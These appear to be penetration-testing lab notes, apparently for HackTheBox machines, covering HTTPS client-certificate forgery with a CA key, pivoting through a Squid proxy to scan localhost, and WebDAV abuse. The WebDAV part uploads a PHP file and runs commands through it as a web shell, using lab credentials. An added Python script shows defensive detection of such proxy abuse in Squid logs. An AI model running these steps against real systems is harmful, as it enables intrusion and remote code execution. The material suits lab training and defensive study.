HTTP/HTTPS
HyperText Transfer Protocol - Port 80/443
Generate a TLS Certificate
With the CA private key already
Verify Client Certificate Requirements:
openssl s_client -connect 10.10.10.131:443
Generate the client's private key:
openssl genrsa -out client.key 4096
Create a certificate signing request (CSR), ensure the fields match the server's expectations:
openssl req -new -key client.key -out client.req
Sign the CSR with the CA's private key to issue a client certificate:
openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer
Convert the private key and certificate into a PKCS#12 (.p12) format file for easy import:
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Squid Proxy
Port 3128
The config file normally lives in /etc/squid/squid.conf
Relies on /usr/lib/squid/basic_ncsa_auth for authentication, and the program stores the passwords in /etc/squid/passwords.
Check whether you can use the proxy in reverse to reach the local network.
First add the address and port to the last line of your proxychains.conf file:
http 10.10.10.67 3128
Then, just nmap the localhost:
proxychains nmap -n -sT 127.0.0.1
Upstream Proxy Server
On Burp, go to Settings > Network > Connections.
Create a new rule with * for the Destination Host, set the target proxy as the Proxy Host/Port and set the credentials with Basic Authentication type.
In order to fuzz the localhost, set a Proxy Listener, redirect to 127.0.0.1:80 and set 127.0.0.1:1234 as the interface.
Now add the interface to /etc/proxychains.conf.
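On the defending side, a proxy being used to reach loopback or internal addresses, as in the proxychains and Burp steps above, is visible in Squid's access.log. The following is an added example, not part of the original notes, that flags such entries; the log lines are constructed samples in Squid's default native log format, and the function names are illustrative.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log format:
# time elapsed client code/status bytes method URL user hierarchy/peer type
SAMPLE_LOG = """\
1700000000.101     12 10.10.14.5 TCP_MISS/200 512 GET http://127.0.0.1/ webuser HIER_DIRECT/127.0.0.1 text/html
1700000000.202      3 10.10.14.5 TCP_TUNNEL/200 0 CONNECT 127.0.0.1:22 webuser HIER_DIRECT/127.0.0.1 -
1700000000.303     40 10.10.14.9 TCP_MISS/200 2048 GET http://example.com/index.html webuser HIER_DIRECT/93.184.216.34 text/html
1700000000.404      1 10.10.14.5 TCP_DENIED/407 3900 GET http://192.168.0.1/ - HIER_NONE/- text/html
1700000000.505      2 10.10.14.5 TCP_MISS/503 0 GET http://[::1]:8080/ webuser HIER_DIRECT/::1 -
"""

def target_host(method, url):
    """Return the destination host of a logged request, or None."""
    if method == "CONNECT":          # CONNECT logs host:port, not a URL
        url = "//" + url
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None

def is_internal(host):
    """True for loopback, private, link-local or unspecified addresses."""
    if host is None:
        return False
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                 # a DNS name; resolve separately if needed
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def internal_requests(log_text):
    """Return (client, method, url, status) for requests aimed at internal hosts."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 7:               # skip truncated or malformed lines
            continue
        client, status, method, url = f[2], f[3], f[5], f[6]
        if is_internal(target_host(method, url)):
            hits.append((client, method, url, status))
    return hits

if __name__ == "__main__":
    for hit in internal_requests(SAMPLE_LOG):
        print(*hit)
```

Denied attempts (TCP_DENIED) are reported as well, since a blocked request to an internal address is still worth reviewing.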
WebDAV
Web Distributed Authoring and Versioning, an extension of the HTTP protocol that allows users to collaboratively edit and manage files stored on a remote server.
Extends HTTP methods like GET and POST with additional ones like PROPFIND, PROPPATCH, MKCOL, DELETE, COPY, MOVE, and LOCK.
Credentials can be found at webdav.passwd.
davtest can be used for enumeration.
curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/
curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>